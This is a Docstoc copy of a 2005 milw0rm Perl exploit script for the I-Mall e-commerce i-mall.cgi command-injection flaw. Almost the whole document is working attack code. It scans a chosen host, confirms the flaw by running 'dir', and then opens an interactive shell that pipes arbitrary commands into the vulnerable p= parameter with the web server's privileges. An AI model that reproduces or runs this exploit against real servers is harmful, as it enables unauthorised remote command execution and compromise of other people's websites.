Docstoc

IMall Commerce imall.cgi Remote Command Execution Exploit

Document Sample
IMall Commerce imall.cgi Remote Command Execution Exploit Powered By Docstoc
					                      IMall Commerce imall.cgi Remote Command Execution Exploit   Page 1/4
  1    ##############################################
  2    # I−Mall explo
  3    # Spawn bash style Shell with webserver uid
  4    # Greetz z\, spax, foxtwo, Zone−H
  5    # This Script is currently under development
  6    ##############################################
  7
  8    use strict;
  9    use IO::Socket;
  10   my $host;
  11   my $port;
  12   my $command;
  13   my $url;
  14   my $shiz;
  15   my @results;
  16   my $probe;
  17   my @U;
  18   $U[1] = "/i−mall/i−mall.cgi?p=|";
  19   &intro;
  20   &scan;
  21   &choose;
  22   &command;
  23   &exit;
  24   sub intro {
  25   &help;
  26   &host;
  27   &server;
  28   sleep 1;
  29   };
  30   sub host {
  31   print "\nHost or IP : ";
  32   $host=<STDIN>;
  33   chomp $host;
  34   if ($host eq ""){$host="127.0.0.1"};
  35   $shiz = "|";
  36   print "\nPort (enter to accept 80): ";
  37   $port=<STDIN>;
  38   chomp $port;
  39   if ($port =~/\D/ ){$port="80"};
  40   if ($port eq "" ) {$port = "80"};
  41   };
  42   sub server {
  43   my $X;
  44   print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  45   $probe = "string";
  46   my $output;
  47   my $webserver = "something";
  48   &connect;
  49   for ($X=0; $X<=10; $X++){
  50             $output = $results[$X];
  51             if (defined $output){
  52             if ($output =~/apache/){ $webserver = "apache" };
Jerome Athias                                                                     05/04/2005
                           IMall Commerce imall.cgi Remote Command Execution Exploit   Page 2/4
  53              };
  54    };
  55    if ($webserver ne "apache"){
  56    my $choice = "y";
  57    chomp $choice;
  58    if ($choice =~/N/i) {&exit};
  59                   }else{
  60    print "\n\nOK";
  61              };
  62    };
  63    sub scan {
  64    my $status = "not_vulnerable";
  65    print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  66    my $loop;
  67    my $output;
  68    my $flag;
  69    $command="dir";
  70    for ($loop=1; $loop < @U; $loop++) {
  71    $flag = "0";
  72    $url = $U[$loop];
  73    $probe = "scan";
  74    &connect;
  75    foreach $output (@results){
  76    if ($output =~ /Directory/) {
  77                                               $flag = "1";
  78                                               $status = "vulnerable";
  79                                               };
  80              };
  81    if ($flag eq "0") {
  82    }else{
  83         };
  84    };
  85    if ($status eq "not_vulnerable"){
  86
  87                                              };
  88    };
  89    sub choose {
  90
  91    my $choice="1";
  92    chomp $choice;
  93    if ($choice > @U){ &choose };
  94    if ($choice =~/\D/g ){ &choose };
  95    if ($choice == 0){ &other };
  96    $url = $U[$choice];
  97    };
  98    sub other {
  99    my $other = <STDIN>;
  100   chomp $other;
  101   $U[0] = $other;
  102   };
  103   sub command {
  104   while ($command !~/quit/i) {
Jerome Athias                                                                          05/04/2005
                         IMall Commerce imall.cgi Remote Command Execution Exploit                           Page 3/4
  105   print "[$host]\$ ";
  106   $command = <STDIN>;
  107   chomp $command;
  108   if ($command =~/quit/i) { &exit };
  109   if ($command =~/url/i) { &choose };
  110   if ($command =~/scan/i) { &scan };
  111   if ($command =~/help/i) { &help };
  112   $command =~ s/\s/+/g;
  113   $probe = "command";
  114   if ($command !~/quit|url|scan|help/) {&connect};
  115   };
  116   &exit;
  117   };
  118   sub connect {
  119   my $connection = IO::Socket::INET−>new (
  120                                      Proto => "tcp",
  121                                      PeerAddr => "$host",
  122                                      PeerPort => "$port",
  123                                      ) or die "\nSorry UNABLE TO CONNECT To $host On Port $port.\n";
  124   $connection −> autoflush(1);
  125   if ($probe =~/command|scan/){
  126   print $connection "GET $url$command$shiz HTTP/1.1\r\nHost: $host\r\n\r\n";
  127   }elsif ($probe =~/string/) {
  128   print $connection "HEAD / HTTP/1.1\r\nHost: $host\r\n\r\n";
  129   };
  130
  131   while ( <$connection> ) {
  132                             @results = <$connection>;
  133                              };
  134   close $connection;
  135   if ($probe eq "command"){ &output };
  136   if ($probe eq "string"){ &output };
  137   };
  138   sub output{
  139   my $display;
  140   if ($probe eq "string") {
  141                             my $X;
  142                             for ($X=0; $X<=10; $X++) {
  143                             $display = $results[$X];
  144                             if (defined $display){print "$display";};
  145                                       };
  146                             }else{
  147                             foreach $display (@results){
  148                                   print "$display";
  149                                       };
  150                                };
  151   };
  152   sub exit{
  153   print "\n\n\n ORP";
  154   exit;
  155   };
  156   sub help {
Jerome Athias                                                                                                05/04/2005
                           IMall Commerce imall.cgi Remote Command Execution Exploit   Page 4/4
  157   print "\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n";
  158   print "\n
  159      I−Mall E−Commerce Software i−mall.cgi
  160      Command Execution Vulnerability by SPABAM 2004" ;
  161   print "\n http://www.zone−h.org/advisories/read/id=4904
  162   ";
  163   print "\n I−Mall Exploit v0.99beta18";
  164   print "\n \n note.. web directory is normally /var/www/html";
  165   print "\n";
  166   print "\n Host: www.victim.com or xxx.xxx.xxx.xxx (RETURN for 127.0.0.1)";
  167   print "\n Command: SCAN URL HELP QUIT";
  168   print "\n\n\n\n\n\n\n\n\n\n\n";
  169   };
  170
  171   # milw0rm.com [2005−05−04]




Jerome Athias                                                                          05/04/2005

				
DOCUMENT INFO
Shared By:
Categories:
Tags:
Stats:
views:23
posted:5/24/2010
language:English
pages:4